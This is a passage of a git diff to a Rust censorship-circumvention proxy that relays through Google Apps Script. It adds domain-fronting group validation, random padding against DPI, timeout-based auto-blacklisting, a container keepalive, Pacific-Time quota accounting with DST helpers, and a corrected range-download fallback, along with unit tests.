`app.vercel.com` too). Same shape + /// as the DoH host list. + /// + /// Canonical form for matching is lowercase and trailing-dot + /// trimmed; entries are normalized to that form once at proxy + /// startup. 
The on-disk representation is preserved as written + /// (we don't mutate the user's config), so `Vercel.com.` and + /// `vercel.com` both work — the matcher is the source of truth + /// for equality. + pub domains: Vec, } fn default_fetch_ips_from_api() -> bool { false } @@ -170,6 +375,24 @@ fn default_max_ips_to_scan() -> usize { 100 } fn default_scan_batch_size() -> usize {500} fn default_google_ip_validation() -> bool {true} +/// Default for `tunnel_doh`: `true` (DoH stays inside the tunnel). +/// Flipped from `false` in v1.9.0 per #468 — Iran ISPs filter direct +/// connections to pinned DoH hosts (`dns.google`, `chrome.cloudflare-dns.com`, +/// …) and the prior bypass-on default silently broke DNS for the +/// dominant userbase. Users on networks where direct DoH works can +/// opt back in with `tunnel_doh: false`. +fn default_tunnel_doh() -> bool { true } + +/// Defaults for the auto-blacklist tuning knobs (#391, #444). These +/// preserve historical behavior — `3 strikes / 30s window / 120s cooldown`. +fn default_auto_blacklist_strikes() -> u32 { 3 } +fn default_auto_blacklist_window_secs() -> u64 { 30 } +fn default_auto_blacklist_cooldown_secs() -> u64 { 120 } + +/// Default for `request_timeout_secs`: 30s, matching the historical +/// hard-coded `BATCH_TIMEOUT` and Apps Script's typical response cliff. +fn default_request_timeout_secs() -> u64 { 30 } + fn default_google_ip() -> String { "216.239.38.120".into() } @@ -177,7 +400,7 @@ fn default_front_domain() -> String { "www.google.com".into() } fn default_listen_host() -> String { - "127.0.0.1".into() + "0.0.0.0".into() } fn default_listen_port() -> u16 { 8085 @@ -226,9 +449,52 @@ impl Config { )); } if self.socks5_port == Some(self.listen_port) { - return Err(ConfigError::Invalid( - "listen_port and socks5_port must be different".into(), - )); + return Err(ConfigError::Invalid(format!( + "listen_port and socks5_port must differ on the same host \ + (both set to {} on {}). 
Change one of them in config.json.", + self.listen_port, self.listen_host + ))); + } + for (i, g) in self.fronting_groups.iter().enumerate() { + if g.name.trim().is_empty() { + return Err(ConfigError::Invalid(format!( + "fronting_groups[{}]: name is empty", i + ))); + } + if g.ip.trim().is_empty() { + return Err(ConfigError::Invalid(format!( + "fronting_groups[{}] ('{}'): ip is empty", i, g.name + ))); + } + if g.sni.trim().is_empty() { + return Err(ConfigError::Invalid(format!( + "fronting_groups[{}] ('{}'): sni is empty", i, g.name + ))); + } + // Parse the SNI here so an invalid hostname fails the same + // load path the UI / `mhrv-rs` CLI both use, rather than + // surfacing later only when ProxyServer::new tries to build + // the TLS server name. Same fail-fast contract as the rest + // of validate(). The parse is cheap; runtime path repeats + // it once at proxy startup, idempotently. + if let Err(e) = ServerName::try_from(g.sni.clone()) { + return Err(ConfigError::Invalid(format!( + "fronting_groups[{}] ('{}'): invalid sni '{}': {}", + i, g.name, g.sni, e + ))); + } + if g.domains.is_empty() { + return Err(ConfigError::Invalid(format!( + "fronting_groups[{}] ('{}'): domains list is empty", i, g.name + ))); + } + for d in &g.domains { + if d.trim().is_empty() { + return Err(ConfigError::Invalid(format!( + "fronting_groups[{}] ('{}'): empty domain entry", i, g.name + ))); + } + } } Ok(()) } @@ -236,10 +502,15 @@ impl Config { pub fn mode_kind(&self) -> Result { match self.mode.as_str() { "apps_script" => Ok(Mode::AppsScript), - "google_only" => Ok(Mode::GoogleOnly), + "direct" => Ok(Mode::Direct), + // Deprecated alias. `google_only` was the name of `direct` + // before fronting_groups generalized the mode beyond + // Google's edge. Accepted forever so old configs keep + // working — the UI rewrites it on next save. 
+ "google_only" => Ok(Mode::Direct), "full" => Ok(Mode::Full), other => Err(ConfigError::Invalid(format!( - "unknown mode '{}' (expected 'apps_script', 'google_only', or 'full')", + "unknown mode '{}' (expected 'apps_script', 'direct', or 'full')", other ))), } @@ -306,24 +577,36 @@ mod tests { } #[test] - fn parses_google_only_without_script_id() { - // Bootstrap mode: no script_id, no auth_key — both are only meaningful + fn parses_direct_without_script_id() { + // Direct mode: no script_id, no auth_key — both are only meaningful // once the Apps Script relay exists. + let s = r#"{ + "mode": "direct" + }"#; + let cfg: Config = serde_json::from_str(s).unwrap(); + cfg.validate().expect("direct must validate without script_id / auth_key"); + assert_eq!(cfg.mode_kind().unwrap(), Mode::Direct); + } + + #[test] + fn google_only_alias_parses_as_direct() { + // Backwards compat: `direct` was named `google_only` before + // fronting_groups. Existing configs must continue to load. let s = r#"{ "mode": "google_only" }"#; let cfg: Config = serde_json::from_str(s).unwrap(); - cfg.validate().expect("google_only must validate without script_id / auth_key"); - assert_eq!(cfg.mode_kind().unwrap(), Mode::GoogleOnly); + cfg.validate().expect("google_only alias must still validate"); + assert_eq!(cfg.mode_kind().unwrap(), Mode::Direct); } #[test] - fn google_only_ignores_placeholder_script_id() { + fn direct_ignores_placeholder_script_id() { // UI round-trip: user saved config in apps_script with the placeholder, - // then switched mode to google_only. The placeholder should not block - // validation in the bootstrap mode. + // then switched mode to direct. The placeholder should not block + // validation in the no-relay mode. 
let s = r#"{ - "mode": "google_only", + "mode": "direct", "script_id": "YOUR_APPS_SCRIPT_DEPLOYMENT_ID" }"#; let cfg: Config = serde_json::from_str(s).unwrap(); @@ -375,6 +658,68 @@ mod tests { assert!(cfg.validate().is_err()); } + #[test] + fn fronting_groups_parse_and_validate() { + let s = r#"{ + "mode": "direct", + "fronting_groups": [ + { + "name": "vercel", + "ip": "76.76.21.21", + "sni": "react.dev", + "domains": ["vercel.com", "nextjs.org"] + } + ] + }"#; + let cfg: Config = serde_json::from_str(s).unwrap(); + cfg.validate().unwrap(); + assert_eq!(cfg.fronting_groups.len(), 1); + assert_eq!(cfg.fronting_groups[0].name, "vercel"); + assert_eq!(cfg.fronting_groups[0].domains.len(), 2); + } + + #[test] + fn fronting_group_rejects_invalid_sni_at_validate() { + // SNI must parse as a DNS hostname at the same fail-fast point + // as the rest of validate(), not later at proxy-startup time. + // The CLI and UI both run validate() on Save / before serve. + let s = r#"{ + "mode": "direct", + "fronting_groups": [{ + "name": "bad", + "ip": "1.2.3.4", + "sni": "not a valid hostname", + "domains": ["x.com"] + }] + }"#; + let cfg: Config = serde_json::from_str(s).unwrap(); + let err = cfg.validate().expect_err("invalid sni must fail validate()"); + let msg = format!("{}", err); + assert!(msg.contains("invalid sni"), "error should mention invalid sni: {}", msg); + } + + #[test] + fn fronting_group_rejects_empty_fields() { + for bad in [ + r#"{ "name": "", "ip": "1.2.3.4", "sni": "a.b", "domains": ["x.com"] }"#, + r#"{ "name": "n", "ip": "", "sni": "a.b", "domains": ["x.com"] }"#, + r#"{ "name": "n", "ip": "1.2.3.4","sni": "", "domains": ["x.com"] }"#, + r#"{ "name": "n", "ip": "1.2.3.4","sni": "a.b", "domains": [] }"#, + r#"{ "name": "n", "ip": "1.2.3.4","sni": "a.b", "domains": [" "] }"#, + ] { + let s = format!( + r#"{{ "mode": "direct", "fronting_groups": [{}] }}"#, + bad + ); + let cfg: Config = serde_json::from_str(&s).unwrap(); + assert!( + cfg.validate().is_err(), + 
"expected validation error for: {}", + bad + ); + } + } + #[test] fn rejects_same_http_and_socks5_port() { let s = r#"{ diff --git a/src/domain_fronter.rs b/src/domain_fronter.rs index a18dd212..19807b23 100644 --- a/src/domain_fronter.rs +++ b/src/domain_fronter.rs @@ -21,6 +21,7 @@ use std::time::{Duration, Instant}; use base64::engine::general_purpose::STANDARD as B64; use base64::Engine; +use rand::{thread_rng, Rng, RngCore}; use serde::{Deserialize, Serialize}; use serde_json::Value; use tokio::io::{AsyncReadExt, AsyncWriteExt}; @@ -60,6 +61,11 @@ const POOL_TTL_SECS: u64 = 45; const POOL_MAX: usize = 80; const REQUEST_TIMEOUT_SECS: u64 = 25; const RANGE_PARALLEL_CHUNK_BYTES: u64 = 256 * 1024; +/// Cadence for Apps Script container keepalive pings. Apps Script +/// containers go cold after ~5min idle and cost 1-3s on the first +/// request to wake back up — most painful on YouTube / streaming where +/// the first chunk after a quiet pause stalls the player. +const H1_KEEPALIVE_INTERVAL_SECS: u64 = 240; // Keep synthetic range stitching bounded. Without this, a buggy or hostile // origin can advertise `Content-Range: bytes 0-1/` and make us build a // massive range plan or preallocate an enormous response buffer. @@ -102,6 +108,13 @@ pub struct DomainFronter { inflight: Arc>>>>, coalesced: AtomicU64, blacklist: Arc>>, + /// Per-deployment rolling timeout counter. Maps `script_id` → + /// `(window_start, strike_count)`. Reset when the window expires + /// or when a batch succeeds. Triggers a short-cooldown blacklist + /// at `TIMEOUT_STRIKE_LIMIT`. Distinct from `blacklist` because + /// strike state is per-deployment health bookkeeping, not the + /// permanent ban list. 
+ script_timeouts: Arc>>, relay_calls: AtomicU64, relay_failures: AtomicU64, bytes_relayed: AtomicU64, @@ -123,6 +136,21 @@ pub struct DomainFronter { today_calls: AtomicU64, today_bytes: AtomicU64, today_key: std::sync::Mutex, + /// Suppress the random `_pad` field that v1.8.0+ adds to outbound + /// payloads. Mirrors `Config::disable_padding` (#391). Default false + /// (padding active = stronger DPI defense at +25% bandwidth cost). + disable_padding: bool, + /// Per-instance auto-blacklist tuning. Mirrors `Config::auto_blacklist_*` + /// (#391, #444). Cached here so the hot path in `record_timeout_strike` + /// doesn't have to reach back through the Config (which we don't keep + /// a reference to). + auto_blacklist_strikes: u32, + auto_blacklist_window: Duration, + auto_blacklist_cooldown: Duration, + /// Per-batch HTTP timeout. Mirrors `Config::request_timeout_secs` + /// (#430, masterking32 PR #25). Read by `tunnel_client::fire_batch` + /// so a single config field tunes the timeout used everywhere. + batch_timeout: Duration, } /// Aggregated stats for one remote host. @@ -146,6 +174,12 @@ impl HostStat { const BLACKLIST_COOLDOWN_SECS: u64 = 600; +/// Auto-blacklist defaults are now per-instance fields on `DomainFronter`, +/// driven by `Config::auto_blacklist_strikes` / `_window_secs` / +/// `_cooldown_secs` (#391, #444). The constants below are gone — see the +/// `Config` doc comments for tuning guidance and `default_auto_blacklist_*` +/// for the historical defaults (3 strikes / 30s window / 120s cooldown). + /// Request payload sent to Apps Script (single, non-batch). 
#[derive(Serialize)] struct RelayRequest<'a> { @@ -258,21 +292,44 @@ impl DomainFronter { inflight: Arc::new(Mutex::new(HashMap::new())), coalesced: AtomicU64::new(0), blacklist: Arc::new(std::sync::Mutex::new(HashMap::new())), + script_timeouts: Arc::new(std::sync::Mutex::new(HashMap::new())), relay_calls: AtomicU64::new(0), relay_failures: AtomicU64::new(0), bytes_relayed: AtomicU64::new(0), per_site: Arc::new(std::sync::Mutex::new(HashMap::new())), today_calls: AtomicU64::new(0), today_bytes: AtomicU64::new(0), - today_key: std::sync::Mutex::new(current_utc_day_key()), + today_key: std::sync::Mutex::new(current_pt_day_key()), + disable_padding: config.disable_padding, + auto_blacklist_strikes: config.auto_blacklist_strikes.max(1), + auto_blacklist_window: Duration::from_secs( + config.auto_blacklist_window_secs.clamp(1, 3600), + ), + auto_blacklist_cooldown: Duration::from_secs( + config.auto_blacklist_cooldown_secs.clamp(1, 86400), + ), + batch_timeout: Duration::from_secs( + config.request_timeout_secs.clamp(5, 300), + ), }) } + /// Per-batch HTTP round-trip timeout. Read by `tunnel_client` so the + /// `BATCH_TIMEOUT` constant doesn't have to be touched on every config + /// change. Clamped to `[5s, 300s]` at construction. + pub(crate) fn batch_timeout(&self) -> Duration { + self.batch_timeout + } + /// Record one relay call toward the daily budget. Called once per /// outbound Apps Script fetch. Rolls over both daily counters at - /// 00:00 UTC. - fn record_today(&self, bytes: u64) { - let today = current_utc_day_key(); + /// 00:00 Pacific Time, matching Apps Script's quota reset cadence + /// (#230, #362). Crate-public so the Full-mode batch path in + /// `tunnel_client::fire_batch` can wire into the same accounting + /// (Apps Script sees Full-mode batches as ordinary `UrlFetchApp` + /// calls and counts them against the same daily quota). 
+ pub(crate) fn record_today(&self, bytes: u64) { + let today = current_pt_day_key(); // Fast path: same day as what we last saw. No lock. let mut guard = self.today_key.lock().unwrap(); if *guard != today { @@ -317,8 +374,8 @@ impl DomainFronter { // Read today_key under lock and cheaply check rollover so the // UI never sees stale "today_calls=1847" on a day where no // traffic has flowed yet (e.g. user left the app open past - // midnight UTC). - let today_now = current_utc_day_key(); + // midnight PT). + let today_now = current_pt_day_key(); let today_key = { let mut guard = self.today_key.lock().unwrap(); if *guard != today_now { @@ -341,7 +398,7 @@ impl DomainFronter { today_calls: self.today_calls.load(Ordering::Relaxed), today_bytes: self.today_bytes.load(Ordering::Relaxed), today_key, - today_reset_secs: seconds_until_utc_midnight(), + today_reset_secs: seconds_until_pacific_midnight(), } } @@ -414,17 +471,67 @@ impl DomainFronter { } fn blacklist_script(&self, script_id: &str, reason: &str) { - let until = Instant::now() + Duration::from_secs(BLACKLIST_COOLDOWN_SECS); + self.blacklist_script_for( + script_id, + Duration::from_secs(BLACKLIST_COOLDOWN_SECS), + reason, + ); + } + + fn blacklist_script_for(&self, script_id: &str, cooldown: Duration, reason: &str) { + let until = Instant::now() + cooldown; let mut bl = self.blacklist.lock().unwrap(); bl.insert(script_id.to_string(), until); tracing::warn!( "blacklisted script {} for {}s: {}", mask_script_id(script_id), - BLACKLIST_COOLDOWN_SECS, + cooldown.as_secs(), reason ); } + /// Record a batch timeout against `script_id`. After + /// `TIMEOUT_STRIKE_LIMIT` timeouts inside `TIMEOUT_STRIKE_WINDOW` + /// the deployment is blacklisted with a short cooldown so the + /// round-robin stops sending real traffic to a deployment that's + /// hung (most commonly: stale `TUNNEL_SERVER_URL` after the + /// tunnel-node moved hosts). 
+ pub(crate) fn record_timeout_strike(&self, script_id: &str) { + let now = Instant::now(); + let mut counts = self.script_timeouts.lock().unwrap(); + let entry = counts + .entry(script_id.to_string()) + .or_insert((now, 0)); + if now.duration_since(entry.0) > self.auto_blacklist_window { + *entry = (now, 1); + } else { + entry.1 += 1; + } + let strikes = entry.1; + if strikes >= self.auto_blacklist_strikes { + counts.remove(script_id); + drop(counts); + self.blacklist_script_for( + script_id, + self.auto_blacklist_cooldown, + &format!( + "{} timeouts in {}s", + strikes, + self.auto_blacklist_window.as_secs() + ), + ); + } + } + + /// Clear the timeout strike counter for `script_id`. Called after + /// a batch succeeds so a recovered deployment doesn't keep stale + /// strikes from hours ago — three strikes must occur within one + /// real failure burst, not accumulate across unrelated incidents. + pub(crate) fn record_batch_success(&self, script_id: &str) { + let mut counts = self.script_timeouts.lock().unwrap(); + counts.remove(script_id); + } + /// Log a relay failure with extra guidance on cert-validation cases. /// Rate-limited so a flood of identical "UnknownIssuer" errors doesn't /// fill the log. @@ -512,6 +619,45 @@ impl DomainFronter { } } + /// Keep the Apps Script container warm with a periodic HEAD ping. + /// + /// `acquire()` keeps the *TCP/TLS pool* warm but does nothing for the + /// V8 container Apps Script runs in: that goes cold ~5min after the + /// last UrlFetchApp call and costs 1-3s to spin back up. The symptom + /// is "first request after a quiet period stalls" — most visible on + /// YouTube where the player gives up on a 1.5s `googlevideo.com` + /// chunk that's actually waiting on a cold-start. + /// + /// Bypasses the response cache (`cache_key_opt = None`) and the + /// inflight coalescer — otherwise the second iteration would just + /// hit the cached response from the first and never reach Apps + /// Script. 
The relay payload itself is the cheapest non-error one + /// we can build: a HEAD against `http://example.com/` returns a few + /// hundred bytes, no body decode, no auth. + /// + /// Best-effort. Failures are debug-logged so a flaky network or + /// quota-exhausted account doesn't spam warnings every 4 minutes. + /// Loops forever — caller is expected to drop the JoinHandle on + /// shutdown (the task lives as long as the process). + pub async fn run_h1_keepalive(self: Arc) { + loop { + tokio::time::sleep(Duration::from_secs(H1_KEEPALIVE_INTERVAL_SECS)).await; + let t0 = Instant::now(); + // relay_uncoalesced returns Vec (always — errors are + // baked into 5xx responses), so just observe the duration + // for the debug line. We intentionally don't use relay() + // here because that path goes through the cache + coalesce + // layer, which would short-circuit subsequent pings. + let _ = self + .relay_uncoalesced("HEAD", "http://example.com/", &[], &[], None) + .await; + tracing::debug!( + "H1 container keepalive: {}ms", + t0.elapsed().as_millis() + ); + } + } + async fn acquire(&self) -> Result { { let mut pool = self.pool.lock().await; @@ -642,9 +788,9 @@ impl DomainFronter { /// by relay() already (we skip cache for it). /// 2. Probe with `Range: bytes=0-`. /// 3. 200 back (origin doesn't support ranges) → return as-is. - /// 4. 206 back → parse Content-Range total. If the body fits in - /// the first probe (total <= chunk or body >= total), rewrite - /// the 206 to a 200 so the client — which never asked for a + /// 4. 206 back → parse Content-Range total. If Content-Range says + /// the entity fits in the first probe, rewrite the 206 to a 200 + /// so the client — which never asked for a /// range — doesn't choke on a stray Partial Content. (x.com /// and Cloudflare turnstile in particular reject unsolicited /// 206 on XHR/fetch.) 
@@ -765,24 +911,39 @@ impl DomainFronter { match chunk { Ok(chunk) => full.extend_from_slice(&chunk), Err(reason) => { + // Issue #162: silently rewriting the probe to a 200 + // here truncates the response to whatever the probe + // saw (typically 256 KiB — the chunk size). Browsers + // see HTTP 200 + Content-Length=262144 and treat + // the download as complete; users reported "every + // file capped at 256 KB" because every download + // that hit this failure path landed there. Common + // triggers: Apps Script stripping Content-Range, + // origin returning 200-instead-of-206 on later + // chunks, total mismatch across chunks. Correct + // recovery is a fresh single GET — Apps Script + // fetches the full URL up to its 50 MiB cap. Slow + // for big files vs. the parallel path but produces + // a complete response, which is what matters. tracing::warn!( - "range-parallel: invalid chunk {}-{} for {} ({}); falling back to probe response", - start, - end, - url, - reason, + "range-parallel: invalid chunk {}-{} for {} ({}); falling back to single GET", + start, end, url, reason, ); - return rewrite_206_to_200(&first); + return self.relay(method, url, headers, body).await; } } } if (full.len() as u64) != total { + // Same fallback rationale as the chunk-validation case + // above: returning the probe truncates to 256 KiB. Single + // GET is the only way to give the user a complete file + // when the parallel stitch can't be trusted. tracing::warn!( - "range-parallel: stitched {}/{} bytes for {}; falling back to probe response", + "range-parallel: stitched {}/{} bytes for {}; falling back to single GET", full.len(), total, url, ); - return rewrite_206_to_200(&first); + return self.relay(method, url, headers, body).await; } // Build a 200 OK with Content-Length = full body length. Drop @@ -1060,7 +1221,18 @@ impl DomainFronter { ct, r: true, }; - Ok(serde_json::to_vec(&req)?) 
+ // Serialize via Value so we can splice in the random `_pad` field + // without changing RelayRequest's wire schema. Apps Script ignores + // unknown JSON fields, so old Code.gs deployments stay compatible + // — the pad is just bytes-on-the-wire that the server sees and + // discards. + let mut v = serde_json::to_value(&req)?; + if let Value::Object(map) = &mut v { + if !self.disable_padding { + add_random_pad(map); + } + } + Ok(serde_json::to_vec(&v)?) } // ────── Full-mode tunnel protocol ────────────────────────────────── @@ -1188,6 +1360,9 @@ impl DomainFronter { if let Some(d) = data { map.insert("d".into(), Value::String(d)); } + if !self.disable_padding { + add_random_pad(&mut map); + } Ok(serde_json::to_vec(&Value::Object(map))?) } @@ -1215,6 +1390,9 @@ impl DomainFronter { map.insert("k".into(), Value::String(self.auth_key.clone())); map.insert("t".into(), Value::String("batch".into())); map.insert("ops".into(), serde_json::to_value(ops)?); + if !self.disable_padding { + add_random_pad(&mut map); + } let payload = serde_json::to_vec(&Value::Object(map))?; let path = format!("/macros/s/{}/exec", script_id); @@ -1393,10 +1571,26 @@ fn validate_probe_range( return None; } let range = parse_content_range(headers)?; - if range.start != 0 || range.end > requested_end || !content_range_matches_body(range, body.len()) { + if range.start != 0 || range.end > requested_end { return None; } - Some(range) + if content_range_matches_body(range, body.len()) + || probe_range_covers_complete_entity(range, requested_end) + { + return Some(range); + } + None +} + +fn probe_range_covers_complete_entity(range: ContentRange, requested_end: u64) -> bool { + // Apps Script may decode a gzip body while preserving the origin's + // compressed Content-Range. 
For the synthetic first probe only, a + // 0..total-1 range within the requested chunk is enough to prove we + // already have the complete entity; later chunks still require exact + // Content-Range/body length validation in extract_exact_range_body(). + range.start == 0 + && range.end.saturating_add(1) >= range.total + && range.total <= requested_end.saturating_add(1) } fn checked_stitched_range_capacity(total: u64) -> Option { @@ -1509,30 +1703,74 @@ fn normalize_x_graphql_url(url: &str) -> String { format!("{}{}{}?{}", scheme, host, path, new_query) } -/// "YYYY-MM-DD" of the current UTC date. Used as the daily-reset -/// boundary for `today_calls` / `today_bytes`. We format manually so -/// this stays std-only and doesn't pull `time` or `chrono` for a -/// ~20-line helper. -fn current_utc_day_key() -> String { +/// Maximum bytes of random padding appended to outbound Apps Script +/// JSON request bodies. Picked so the per-request padding distribution +/// (uniformly 0..MAX) shifts the body length enough to defeat naive +/// length-fingerprint DPI without bloating bandwidth — at the average +/// 512-byte add, on a typical 2 KB tunnel batch this is +25%, which is +/// negligible compared to Apps Script's per-call latency floor anyway. +/// (Issue #313, #365 Section 1 — DPI evasion.) +const MAX_RANDOM_PAD_BYTES: usize = 1024; + +/// Insert a `_pad` field of random length (0..MAX_RANDOM_PAD_BYTES) +/// into a request payload before serialization. Server-side ignores +/// unknown JSON fields, so this is fully backward-compatible with old +/// `Code.gs` / `CodeFull.gs` deployments — the pad is just along for +/// the ride. +/// +/// Random bytes are base64-encoded (NO inner JSON-escape worries) and +/// the pad LENGTH itself is uniformly distributed, so packet sizes +/// land all over the place rather than clustering at a few discrete +/// peaks. That's the property DPI's length-distribution clustering +/// fingerprints can't match. 
+fn add_random_pad(map: &mut serde_json::Map) { + let mut rng = thread_rng(); + let len = rng.gen_range(0..=MAX_RANDOM_PAD_BYTES); + if len == 0 { + // Skip the field entirely sometimes — adds another bit of + // distribution variance (presence-vs-absence of `_pad` itself). + return; + } + let mut buf = vec![0u8; len]; + rng.fill_bytes(&mut buf); + map.insert("_pad".into(), Value::String(B64.encode(&buf))); +} + +/// "YYYY-MM-DD" of the current Pacific Time date. Used as the daily-reset +/// boundary for `today_calls` / `today_bytes` because **Apps Script's +/// quota counter resets at midnight Pacific Time, not UTC** — that's +/// where Google's quota bookkeeping lives. We format manually so this +/// stays std-only and doesn't pull `time-tz` or `chrono` plus a ~3 MB +/// IANA tzdb just for one ~50-line helper. (Issue #230, #362.) +/// +/// PT offset depends on DST: PST = UTC-8, PDT = UTC-7. We use the +/// stable US DST rule (2nd Sunday of March 02:00 → 1st Sunday of +/// November 02:00 = PDT, otherwise PST). The hour-of-day boundary on +/// transition days is approximated; this drifts by up to 1h for at +/// most 2h/year on the spring-forward / fall-back transitions, which +/// is fine for a daily countdown. +fn current_pt_day_key() -> String { let secs = std::time::SystemTime::now() .duration_since(std::time::UNIX_EPOCH) .map(|d| d.as_secs()) .unwrap_or(0); - let (y, m, d) = unix_to_ymd_utc(secs); + let pt_secs = unix_to_pt_seconds(secs); + let (y, m, d) = unix_to_ymd_utc(pt_secs); format!("{:04}-{:02}-{:02}", y, m, d) } -/// Seconds until the next 00:00 UTC. Used by the UI to render a -/// "resets in Xh Ym" countdown without the UI having to import time -/// libraries. Conservative: if the system clock is broken we return -/// 0 instead of a huge negative-looking number. -fn seconds_until_utc_midnight() -> u64 { +/// Seconds until the next 00:00 Pacific Time. 
Used by the UI to render +/// a "resets in Xh Ym" countdown matching Apps Script's actual quota +/// reset cadence (#230, #362). Conservative: if the system clock is +/// broken we return 0 instead of a huge negative-looking number. +fn seconds_until_pacific_midnight() -> u64 { let secs = std::time::SystemTime::now() .duration_since(std::time::UNIX_EPOCH) .map(|d| d.as_secs()) .unwrap_or(0); + let pt_secs = unix_to_pt_seconds(secs); let day = 86_400u64; - let rem = secs % day; + let rem = pt_secs % day; if rem == 0 { day } else { @@ -1540,6 +1778,65 @@ fn seconds_until_utc_midnight() -> u64 { } } +/// Convert Unix UTC seconds to "Pacific Time as if it were UTC" seconds, +/// i.e. add the PT-from-UTC offset (negative for the western hemisphere +/// becomes a subtraction). Result is suitable for feeding into +/// `unix_to_ymd_utc` to extract the PT calendar date, or for `% 86_400` +/// to find PT seconds-into-day. +fn unix_to_pt_seconds(utc_secs: u64) -> u64 { + // First-pass guess at PT date using PST (-8) — used to determine + // whether DST is currently in effect, which then settles the actual + // offset. The two-pass approach avoids the chicken-and-egg of + // "I need the PT date to know if it's DST, but I need the offset + // to compute the PT date." A 1-hour fudge in the guess is harmless + // because DST never starts within the first hour after midnight + // PST or ends within the first hour after midnight PDT. + let pst_guess = utc_secs.saturating_sub(8 * 3600); + let (y, m, d) = unix_to_ymd_utc(pst_guess); + let offset_secs = if pacific_is_dst(y, m, d) { + 7 * 3600 + } else { + 8 * 3600 + }; + utc_secs.saturating_sub(offset_secs) +} + +/// Whether Pacific Time is observing daylight saving on the given +/// calendar date (year, month=1..12, day=1..31). US DST window: +/// 2nd Sunday of March through 1st Sunday of November. The transition +/// hour itself (02:00 local) is approximated to whole-day boundaries — +/// good enough for a daily-quota countdown. 
+fn pacific_is_dst(year: i64, month: u32, day: u32) -> bool { + if month < 3 || month > 11 { + return false; + } + if month > 3 && month < 11 { + return true; + } + if month == 3 { + let dst_start = nth_sunday_of_month(year, 3, 2); + day >= dst_start + } else { + // month == 11 + let dst_end = nth_sunday_of_month(year, 11, 1); + day < dst_end + } +} + +/// Day-of-month for the Nth Sunday (1-indexed) of (year, month). Uses +/// Sakamoto's method for the month's-1st day-of-week, then offsets to +/// the desired Sunday. Pure arithmetic, no calendar tables. +fn nth_sunday_of_month(year: i64, month: u32, nth: u32) -> u32 { + // Sakamoto's day-of-week. 0 = Sunday. + static T: [i64; 12] = [0, 3, 2, 5, 0, 3, 5, 1, 4, 6, 2, 4]; + let y = if month < 3 { year - 1 } else { year }; + let m = month as i64; + let dow_of_1st = + ((y + y / 4 - y / 100 + y / 400 + T[(m - 1) as usize] + 1).rem_euclid(7)) as u32; + let first_sunday = if dow_of_1st == 0 { 1 } else { 8 - dow_of_1st }; + first_sunday + (nth - 1) * 7 +} + /// Convert a Unix timestamp (seconds since 1970-01-01 UTC) to a /// (year, month, day) tuple, UTC. Standalone so we can stay /// std-only — no chrono/time/jiff dependency pulled for one caller. @@ -2012,15 +2309,18 @@ pub struct StatsSnapshot { pub cache_bytes: usize, pub blacklisted_scripts: usize, pub total_scripts: usize, - /// Relay calls attributed to the current UTC day. Resets at 00:00 UTC. - /// This is what-this-process-has-done today, not the Google-side bucket. + /// Relay calls attributed to the current Pacific Time day. Resets + /// at 00:00 PT (midnight Pacific) — matches Apps Script's actual + /// quota reset cadence (#230, #362). This is what-this-process- + /// has-done today, not the Google-side bucket. pub today_calls: u64, - /// Response bytes from relay calls attributed to the current UTC day. + /// Response bytes from relay calls attributed to the current PT day. 
pub today_bytes: u64, - /// "YYYY-MM-DD" of the day `today_calls` / `today_bytes` refer to. - /// Useful for cross-referencing against Google's dashboard. + /// "YYYY-MM-DD" of the PT day `today_calls` / `today_bytes` refer + /// to. Useful for cross-referencing against Google's dashboard, + /// which is also PT-aligned. pub today_key: String, - /// Seconds until the next 00:00 UTC rollover. Convenient for the UI + /// Seconds until the next 00:00 PT rollover. Convenient for the UI /// to render "Resets in Xh Ym" without importing time libraries. pub today_reset_secs: u64, } @@ -2092,6 +2392,11 @@ fn looks_like_quota_error(msg: &str) -> bool { || lower.contains("rate limit") || lower.contains("too many times") || lower.contains("service invoked") + || lower.contains("bandwidth") + || lower.contains("bandbreitenkontingent") + || lower.contains("datenübertragungsrate") + || lower.contains("transfer rate") + || lower.contains("limit exceeded") } fn mask_script_id(id: &str) -> String { @@ -2227,12 +2532,47 @@ mod tests { } #[test] - fn seconds_until_utc_midnight_is_bounded() { - let n = seconds_until_utc_midnight(); + fn seconds_until_pacific_midnight_is_bounded() { + let n = seconds_until_pacific_midnight(); // Must be in (0, 86400] for any valid system clock. assert!(n > 0 && n <= 86_400); } + #[test] + fn nth_sunday_of_month_anchors() { + // Spot-check Sakamoto's day-of-week + offset arithmetic against + // a few known Sundays. Mistakes here would silently shift the + // DST transition by ±1 week. + // March 2026: 2nd Sunday is March 8 (Sun Mar 1, Sun Mar 8). + assert_eq!(nth_sunday_of_month(2026, 3, 2), 8); + // November 2026: 1st Sunday is November 1 (Sun Nov 1). + assert_eq!(nth_sunday_of_month(2026, 11, 1), 1); + // March 2024: 2nd Sunday is March 10 (Sun Mar 3, Sun Mar 10). + assert_eq!(nth_sunday_of_month(2024, 3, 2), 10); + // November 2024: 1st Sunday is November 3. + assert_eq!(nth_sunday_of_month(2024, 11, 1), 3); + // March 2027: 2nd Sunday is March 14. 
+ assert_eq!(nth_sunday_of_month(2027, 3, 2), 14); + } + + #[test] + fn pacific_dst_window_anchors() { + // Outside the DST window: PST. + assert!(!pacific_is_dst(2026, 1, 15)); + assert!(!pacific_is_dst(2026, 12, 25)); + assert!(!pacific_is_dst(2026, 2, 28)); + assert!(!pacific_is_dst(2026, 11, 5)); // first Sun of Nov 2026 = Nov 1; Nov 5 is past + // Inside: PDT. + assert!(pacific_is_dst(2026, 6, 1)); + assert!(pacific_is_dst(2026, 9, 30)); + // Boundary: March 8, 2026 (DST start day) and after = PDT. + assert!(!pacific_is_dst(2026, 3, 7)); + assert!(pacific_is_dst(2026, 3, 8)); + // Boundary: Oct 31 = PDT, Nov 1 = first Sunday = PST flips on. + assert!(pacific_is_dst(2026, 10, 31)); + assert!(!pacific_is_dst(2026, 11, 1)); + } + #[test] fn filter_forwarded_headers_strips_identity_revealing_headers() { // Issue #104: any proxy/extension that inserts these must not @@ -2428,6 +2768,59 @@ mod tests { assert_eq!(parse_content_range_total(&headers), None); } + #[test] + fn validate_probe_range_accepts_decoded_full_entity_body_mismatch() { + let mut raw = b"HTTP/1.1 206 Partial Content\r\n\ +Content-Range: bytes 0-11247/11248\r\n\ +Content-Type: text/javascript\r\n\ +Vary: Accept-Encoding\r\n\ +Content-Length: 45812\r\n\r\n" + .to_vec(); + raw.extend(std::iter::repeat(b'x').take(45_812)); + + let (status, headers, body) = split_response(&raw).unwrap(); + assert_eq!( + validate_probe_range(status, &headers, body, RANGE_PARALLEL_CHUNK_BYTES - 1), + Some(ContentRange { + start: 0, + end: 11_247, + total: 11_248, + }), + ); + + let rewritten = rewrite_206_to_200(&raw); + let (status, headers, body) 